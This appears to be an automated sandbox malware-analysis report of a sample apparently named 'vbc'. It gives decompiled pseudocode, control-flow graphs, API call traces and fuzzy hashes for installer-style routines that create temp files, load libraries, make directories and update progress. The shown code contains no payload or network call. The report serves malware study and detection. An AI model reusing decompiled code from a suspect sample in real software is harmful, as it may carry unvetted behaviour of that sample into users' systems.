                    • Instruction ID: 901bd6854243c6da76049475d0ff8a2e94d85496216772a9058b0745b2eb723c
                    • Opcode Fuzzy Hash: f4aa0f7c9f0489e4ae492ae03759b1d2c527aa83a6eadd22a49edea80f9966f4
                    • Instruction Fuzzy Hash: 0241B475400347AFEB0D9F24D984F9537BCEF04314F1C4469E91BAA2C6DB788184CBA8
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 940 406039-406045 941 406046-40607a GetTickCount GetTempFileNameW 940->941 942 406089-40608b 941->942 943 40607c-40607e 941->943 945 406083-406086 942->945 943->941 944 406080 943->944 944->945
                    C-Code - Quality: 100%
                    			E00406039(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
                    				intOrPtr _v8;
                    				short _v12;
                    				short _t12;
                    				intOrPtr _t13;
                    				signed int _t14;
                    				WCHAR* _t17;
                    				signed int _t19;
                    				signed short _t23;
                    				WCHAR* _t26;
                    
                    				_t26 = _a4;
                    				_t23 = 0x64;
                    				while(1) {
                    					_t12 =  *L"nsa"; // 0x73006e
                    					_t23 = _t23 - 1;
                    					_v12 = _t12;
                    					_t13 =  *0x40a57c; // 0x61
                    					_v8 = _t13;
                    					_t14 = GetTickCount();
                    					_t19 = 0x1a;
                    					_v8 = _v8 + _t14 % _t19;
                    					_t17 = GetTempFileNameW(_a8,  &_v12, 0, _t26); // executed
                    					if(_t17 != 0) {
                    						break;
                    					}
                    					if(_t23 != 0) {
                    						continue;
                    					} else {
                    						 *_t26 =  *_t26 & _t23;
                    					}
                    					L4:
                    					return _t17;
                    				}
                    				_t17 = _t26;
                    				goto L4;
                    			}












                    0x0040603f
                    0x00406045
                    0x00406046
                    0x00406046
                    0x0040604b
                    0x0040604c
                    0x0040604f
                    0x00406054
                    0x00406057
                    0x00406061
                    0x0040606e
                    0x00406072
                    0x0040607a
                    0x00000000
                    0x00000000
                    0x0040607e
                    0x00000000
                    0x00406080
                    0x00406080
                    0x00406080
                    0x00406083
                    0x00406086
                    0x00406086
                    0x00406089
                    0x00000000

                    APIs
                    • GetTickCount.KERNEL32(7556D4C4,C:\Users\user\AppData\Local\Temp\,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406057
                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,?,00403508,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406072
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CountFileNameTempTick
                    • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                    • API String ID: 1716503409-4262883142
                    • Opcode ID: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                    • Instruction ID: d9a4429216a2c16f2b1e0ff0632edab8c7003fcac11a898ec3991e0c35e2d836
                    • Opcode Fuzzy Hash: 418a87fb760587bef7583f4f3acae06d17b3011fc99645d3e11ea5bfcaa5fca8
                    • Instruction Fuzzy Hash: 84F0F076B40204BFEB00CF59ED05E9EB7ACEB95750F01803AEE45F3140E6B099648768
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 950 4020d8-4020e4 951 4021a3-4021a5 950->951 952 4020ea-402100 call 402da6 * 2 950->952 953 4022f1-4022f6 call 401423 951->953 962 402110-40211f LoadLibraryExW 952->962 963 402102-40210e GetModuleHandleW 952->963 960 402c2a-402c39 953->960 961 40292e-402935 953->961 961->960 966 402121-402130 call 406956 962->966 967 40219c-40219e 962->967 963->962 963->966 970 402132-402138 966->970 971 40216b-402170 call 40557c 966->971 967->953 973 402151-402164 call 734f1817 970->973 974 40213a-402146 call 401423 970->974 975 402175-402178 971->975 977 402166-402169 973->977 974->975 984 402148-40214f 974->984 975->960 978 40217e-402188 call 403b69 975->978 977->975 978->960 983 40218e-402197 FreeLibrary 978->983 983->960 984->975
                    C-Code - Quality: 60%
                    			E004020D8(void* __ebx, void* __eflags) {
                    				struct HINSTANCE__* _t23;
                    				struct HINSTANCE__* _t31;
                    				void* _t32;
                    				WCHAR* _t35;
                    				intOrPtr* _t36;
                    				void* _t37;
                    				void* _t39;
                    
                    				_t32 = __ebx;
                    				asm("sbb eax, 0x7a8b20");
                    				 *(_t39 - 4) = 1;
                    				if(__eflags < 0) {
                    					_push(0xffffffe7);
                    					L15:
                    					E00401423();
                    					L16:
                    					 *0x7a8ae8 =  *0x7a8ae8 +  *(_t39 - 4);
                    					return 0;
                    				}
                    				_t35 = E00402DA6(0xfffffff0);
                    				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                    				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                    					L3:
                    					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                    					_t47 = _t23 - _t32;
                    					 *(_t39 + 8) = _t23;
                    					if(_t23 == _t32) {
                    						_push(0xfffffff6);
                    						goto L15;
                    					}
                    					L4:
                    					_t36 = E00406956(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                    					if(_t36 == _t32) {
                    						E0040557C(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                    					} else {
                    						 *(_t39 - 4) = _t32;
                    						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                    							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce28, 0x40a000); // executed
                    						} else {
                    							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                    							if( *_t36() != 0) {
                    								 *(_t39 - 4) = 1;
                    							}
                    						}
                    					}
                    					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403B69( *(_t39 + 8)) != 0) {
                    						FreeLibrary( *(_t39 + 8));
                    					}
                    					goto L16;
                    				}
                    				_t31 = GetModuleHandleW(_t35); // executed
                    				 *(_t39 + 8) = _t31;
                    				if(_t31 != __ebx) {
                    					goto L4;
                    				}
                    				goto L3;
                    			}










                    0x004020d8
                    0x004020d8
                    0x004020dd
                    0x004020e4
                    0x004021a3
                    0x004022f1
                    0x004022f1
                    0x00402c2a
                    0x00402c2d
                    0x00402c39
                    0x00402c39
                    0x004020f3
                    0x004020fd
                    0x00402100
                    0x00402110
                    0x00402114
                    0x0040211a
                    0x0040211c
                    0x0040211f
                    0x0040219c
                    0x00000000
                    0x0040219c
                    0x00402121
                    0x0040212c
                    0x00402130
                    0x00402170
                    0x00402132
                    0x00402135
                    0x00402138
                    0x00402164
                    0x0040213a
                    0x0040213d
                    0x00402146
                    0x00402148
                    0x00402148
                    0x00402146
                    0x00402138
                    0x00402178
                    0x00402191
                    0x00402191
                    0x00000000
                    0x00402178
                    0x00402103
                    0x0040210b
                    0x0040210e
                    0x00000000
                    0x00000000
                    0x00000000

                    APIs
                    • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                      • Part of subcall function 0040557C: lstrlenW.KERNEL32(007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000,?), ref: 004055B4
                      • Part of subcall function 0040557C: lstrlenW.KERNEL32(004033F5,007A0F28,00000000,0079BD28,7555110C,?,?,?,?,?,?,?,?,?,004033F5,00000000), ref: 004055C4
                      • Part of subcall function 0040557C: lstrcatW.KERNEL32 ref: 004055D7
                      • Part of subcall function 0040557C: SetWindowTextW.USER32 ref: 004055E9
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040560F
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405629
                      • Part of subcall function 0040557C: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405637
                    • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,?,?,00000008,00000001,000000F0), ref: 00402191
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                    • String ID:
                    • API String ID: 334405425-0
                    • Opcode ID: 688cee1cde8ba92b562b3ba80e2bde83ced805693af450c3221be772be186c94
                    • Instruction ID: 444e3b163f15bd358be0b4800c507c2147bc3560cfb58e26f6c7225f93e15a3b
                    • Opcode Fuzzy Hash: 688cee1cde8ba92b562b3ba80e2bde83ced805693af450c3221be772be186c94
                    • Instruction Fuzzy Hash: D621D471904104FACF11AFA5CF48E9E7A71BF48354F20413BF505B91E1DBBD8A929A1D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 59%
                    			E00401B9B(void* __ebx) {
                    				intOrPtr _t8;
                    				void* _t9;
                    				void _t12;
                    				void* _t14;
                    				void* _t22;
                    				void* _t25;
                    				void* _t30;
                    				char* _t32;
                    				void* _t33;
                    				void* _t34;
                    				void* _t37;
                    
                    				_t28 = __ebx;
                    				_t8 =  *((intOrPtr*)(_t37 - 0x28));
                    				_t33 =  *0x40ce28; // 0x9fce50
                    				if(_t8 == __ebx) {
                    					if( *((intOrPtr*)(_t37 - 0x2c)) == __ebx) {
                    						_t9 = GlobalAlloc(0x40, 0x804); // executed
                    						_t34 = _t9;
                    						_t5 = _t34 + 4; // 0x4
                    						E00406557(__ebx, _t30, _t34, _t5,  *((intOrPtr*)(_t37 - 0x30)));
                    						_t12 =  *0x40ce28; // 0x9fce50
                    						 *_t34 = _t12;
                    						 *0x40ce28 = _t34;
                    					} else {
                    						if(_t33 == __ebx) {
                    							 *((intOrPtr*)(_t37 - 4)) = 1;
                    						} else {
                    							_t3 = _t33 + 4; // 0x9fce54
                    							E0040651A(_t30, _t3);
                    							_push(_t33);
                    							 *0x40ce28 =  *_t33;
                    							GlobalFree();
                    						}
                    					}
                    					goto L15;
                    				} else {
                    					while(1) {
                    						_t8 = _t8 - 1;
                    						if(_t33 == _t28) {
                    							break;
                    						}
                    						_t33 =  *_t33;
                    						if(_t8 != _t28) {
                    							continue;
                    						} else {
                    							if(_t33 == _t28) {
                    								break;
                    							} else {
                    								_t36 = _t33 + 4;
                    								_t32 = L"Call";
                    								E0040651A(_t32, _t33 + 4);
                    								_t22 =  *0x40ce28; // 0x9fce50
                    								E0040651A(_t36, _t22 + 4);
                    								_t25 =  *0x40ce28; // 0x9fce50
                    								_push(_t32);
                    								_push(_t25 + 4);
                    								E0040651A();
                    								L15:
                    								 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t37 - 4));
                    								_t14 = 0;
                    							}
                    						}
                    						goto L17;
                    					}
                    					_push(0x200010);
                    					_push(E00406557(_t28, _t30, _t33, _t28, 0xffffffe8));
                    					E00405B7A();
                    					_t14 = 0x7fffffff;
                    				}
                    				L17:
                    				return _t14;
                    			}














                    0x00401b9b
                    0x00401b9b
                    0x00401b9e
                    0x00401ba6
                    0x00401bef
                    0x00401c1d
                    0x00401c26
                    0x00401c28
                    0x00401c2c
                    0x00401c31
                    0x00401c36
                    0x00401c38
                    0x00401bf1
                    0x00401bf3
                    0x0040292e
                    0x00401bf9
                    0x00401bf9
                    0x00401bfe
                    0x00401c05
                    0x00401c06
                    0x00401c0b
                    0x00401c0b
                    0x00401bf3
                    0x00000000
                    0x00401ba8
                    0x00401ba8
                    0x00401ba8
                    0x00401bab
                    0x00000000
                    0x00000000
                    0x00401bb1
                    0x00401bb5
                    0x00000000
                    0x00401bb7
                    0x00401bb9
                    0x00000000
                    0x00401bbf
                    0x00401bbf
                    0x00401bc2
                    0x00401bc9
                    0x00401bce
                    0x00401bd8
                    0x00401bdd
                    0x00401be2
                    0x00401be6
                    0x00402a94
                    0x00402c2a
                    0x00402c2d
                    0x00402c33
                    0x00402c33
                    0x00401bb9
                    0x00000000
                    0x00401bb5
                    0x0040238a
                    0x00402397
                    0x00402398
                    0x0040239d
                    0x0040239d
                    0x00402c35
                    0x00402c39

                    APIs
                    • GlobalFree.KERNEL32(009FCE50), ref: 00401C0B
                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C1D
                      • Part of subcall function 00406557: lstrcatW.KERNEL32 ref: 004066FC
                      • Part of subcall function 00406557: lstrlenW.KERNEL32(Call,00000000,007A0F28,?,004055B3,007A0F28,00000000), ref: 00406756
                    Strings
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: Global$AllocFreelstrcatlstrlen
                    • String ID: Call
                    • API String ID: 3292104215-1824292864
                    • Opcode ID: b890c972c8bf46be985b92796f08af71a41c27e005c5bd4be6b96cad305d66d6
                    • Instruction ID: 26dbd5a77eb58e605bfe28f9d4715249581a5b1b61a00b50ad00dbbd18183bd9
                    • Opcode Fuzzy Hash: b890c972c8bf46be985b92796f08af71a41c27e005c5bd4be6b96cad305d66d6
                    • Instruction Fuzzy Hash: CE219373904210EBD721AFA4DEC4A9E73A4EB08328715453BF542F72D0D6BCA8418B5D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			E004015C1(short __ebx, void* __eflags) {
                    				void* _t17;
                    				int _t23;
                    				void* _t25;
                    				signed char _t26;
                    				short _t28;
                    				short _t31;
                    				short* _t34;
                    				void* _t36;
                    
                    				_t28 = __ebx;
                    				 *(_t36 + 8) = E00402DA6(0xfffffff0);
                    				_t17 = E00405E94(_t16);
                    				_t32 = _t17;
                    				if(_t17 != __ebx) {
                    					do {
                    						_t34 = E00405E16(_t32, 0x5c);
                    						_t31 =  *_t34;
                    						 *_t34 = _t28;
                    						if(_t31 != _t28) {
                    							L5:
                    							_t25 = E00405AC8( *(_t36 + 8));
                    						} else {
                    							_t42 =  *((intOrPtr*)(_t36 - 0x28)) - _t28;
                    							if( *((intOrPtr*)(_t36 - 0x28)) == _t28 || E00405AE5(_t42) == 0) {
                    								goto L5;
                    							} else {
                    								_t25 = E00405A4B( *(_t36 + 8)); // executed
                    							}
                    						}
                    						if(_t25 != _t28) {
                    							if(_t25 != 0xb7) {
                    								L9:
                    								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                    							} else {
                    								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
                    								if((_t26 & 0x00000010) == 0) {
                    									goto L9;
                    								}
                    							}
                    						}
                    						 *_t34 = _t31;
                    						_t32 = _t34 + 2;
                    					} while (_t31 != _t28);
                    				}
                    				if( *((intOrPtr*)(_t36 - 0x2c)) == _t28) {
                    					_push(0xfffffff5);
                    					E00401423();
                    				} else {
                    					E00401423(0xffffffe6);
                    					E0040651A(0x7b4000,  *(_t36 + 8));
                    					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
                    					if(_t23 == 0) {
                    						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
                    					}
                    				}
                    				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t36 - 4));
                    				return 0;
                    			}











                    0x004015c1
                    0x004015c9
                    0x004015cc
                    0x004015d1
                    0x004015d5
                    0x004015d7
                    0x004015df
                    0x004015e1
                    0x004015e4
                    0x004015ea
                    0x00401604
                    0x00401607
                    0x004015ec
                    0x004015ec
                    0x004015ef
                    0x00000000
                    0x004015fa
                    0x004015fd
                    0x004015fd
                    0x004015ef
                    0x0040160e
                    0x00401615
                    0x00401624
                    0x00401624
                    0x00401617
                    0x0040161a
                    0x00401622
                    0x00000000
                    0x00000000
                    0x00401622
                    0x00401615
                    0x00401627
                    0x0040162b
                    0x0040162c
                    0x004015d7
                    0x00401634
                    0x00401663
                    0x004022f1
                    0x00401636
                    0x00401638
                    0x00401645
                    0x0040164d
                    0x00401655
                    0x0040165b
                    0x0040165b
                    0x00401655
                    0x00402c2d
                    0x00402c39

                    APIs
                      • Part of subcall function 00405E94: CharNextW.USER32(?), ref: 00405EA2
                      • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EA7
                      • Part of subcall function 00405E94: CharNextW.USER32(00000000), ref: 00405EBF
                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                      • Part of subcall function 00405A4B: CreateDirectoryW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 00405A8E
                    • SetCurrentDirectoryW.KERNELBASE(?,007B4000,?,00000000,000000F0), ref: 0040164D
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                    • String ID:
                    • API String ID: 1892508949-0
                    • Opcode ID: be34f831566008b24982441b18b2d2c73a052184d4bf83d6b95b892da155639b
                    • Instruction ID: b26d59bbbb8bd31aa62bfaa3988508fb5429084e49f4d8f394da2dab55023cb6
                    • Opcode Fuzzy Hash: be34f831566008b24982441b18b2d2c73a052184d4bf83d6b95b892da155639b
                    • Instruction Fuzzy Hash: E611E631504115EBCF216FA5CD40A9F36A0EF15369B28493BF541B52F1DA3E4A819F4D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 69%
                    			E00401389(signed int _a4, struct HWND__* _a10) {
                    				intOrPtr* _t6;
                    				void* _t8;
                    				void* _t10;
                    				signed int _t11;
                    				void* _t12;
                    				signed int _t16;
                    				signed int _t17;
                    
                    				_t17 = _a4;
                    				while(_t17 >= 0) {
                    					_t6 = _t17 * 0x1c +  *0x7a8a90;
                    					if( *_t6 == 1) {
                    						break;
                    					}
                    					_push(_t6); // executed
                    					_t8 = E00401434(); // executed
                    					if(_t8 == 0x7fffffff) {
                    						return 0x7fffffff;
                    					}
                    					_t10 = E0040136D(_t8);
                    					if(_t10 != 0) {
                    						_t11 = _t10 - 1;
                    						_t16 = _t17;
                    						_t17 = _t11;
                    						_t12 = _t11 - _t16;
                    					} else {
                    						_t12 = _t10 + 1;
                    						_t17 = _t17 + 1;
                    					}
                    					if(_a10 != 0) {
                    						 *0x7a7a4c =  *0x7a7a4c + _t12;
                    						SendMessageW(_a10, 0x402, MulDiv( *0x7a7a4c, 0x7530,  *0x7a7a34), 0); // executed
                    					}
                    				}
                    				return 0;
                    			}










                    0x0040138a
                    0x004013fa
                    0x0040139b
                    0x004013a0
                    0x00000000
                    0x00000000
                    0x004013a2
                    0x004013a3
                    0x004013ad
                    0x00000000
                    0x00401404
                    0x004013b0
                    0x004013b7
                    0x004013bd
                    0x004013be
                    0x004013c0
                    0x004013c2
                    0x004013b9
                    0x004013b9
                    0x004013ba
                    0x004013ba
                    0x004013c9
                    0x004013cb
                    0x004013f4
                    0x004013f4
                    0x004013c9
                    0x00000000

                    APIs
                    • MulDiv.KERNEL32 ref: 004013E4
                    • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159093599.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159099020.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159102944.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159106607.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159119278.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159123096.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159126876.00000000007A9000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159130875.00000000007AD000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159134740.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1159140111.00000000007D6000.00000002.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID:
                    • API String ID: 3850602802-0
                    • Opcode ID: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                    • Instruction ID: 637f0bbede897030ab690e2e99e2181d797c58f7d0d2aab6e1f53bdf2be6ce4b
                    • Opcode Fuzzy Hash: 0f992e2ae6cf3b1b8dd96a4b6b0adf3515dff43e38b3359cc4322e8ed16e10f0
                    • Instruction Fuzzy Hash: 9501F432624220ABE7195B389D05B2A3698E751314F10C13FF955F69F1EA78CC02DB4D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E0040564F(signed int __eax) {
                    				struct HWND__* _v0;
                    				intOrPtr _t10;
                    				intOrPtr _t11;
                    				intOrPtr* _t12;
                    
                    				_t11 =  *0x7a8a88;
                    				_t10 =  *0x7a8a8c;
                    				__imp__OleInitialize(0); // executed
                    				 *0x7a8b20 =  *0x7a8b20 | __eax;
                    				E004044C2(0);
                    				if(_t10 != 0) {
                    					_t12 = _t11 + 0xc;
                    					while(1) {
                    						_t10 = _t10 - 1;
                    						if(( *(_t12 - 4) & 0x00000001) != 0 && E00401389( *_t12, _v0) != 0) {
                    							break;
                    						}
                    						_t12 = _t12 + 0x818;
                    						if(_t10 != 0) {
                    							continue;
                    						} else {
                    						}
                    						goto L7;
                    					}
                    					 *0x7a8aec =  *0x7a8aec + 1;
                    				}
                    				L7:
                    				E004044C2(0x404);
                    				__imp__OleUninitialize();
                    				return  *0x7a8aec;
                    			}







                    0x00405650
                    0x00405657
                    0x0040565f
                    0x00405665
                    0x0040566d
                    0x00405674
                    0x00405676
                    0x00405679
                    0x00405679
                    0x0040567e
                    0x00000000
                    0x00000000
                    0x0040568f
                    0x00405697
                    0x00000000
                    0x00000000
                    0x00405699
                    0x00000000
                    0x00405697
                    0x0040569b
                    0x0040569b
                    0x004056a1
                    0x004056a6
                    0x004056ab
                    0x004056b8

                    APIs
                    • OleInitialize.OLE32(00000000), ref: 0040565F
                      • Part of subcall function 004044C2: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004044D4
                    • OleUninitialize.OLE32 ref: 004056AB
                    Memory Dump Source
                    • Source File: 00000004.00000002.1158964783.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000004.00000002.1158961490.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158969783.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000004.00000002.1158973699.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
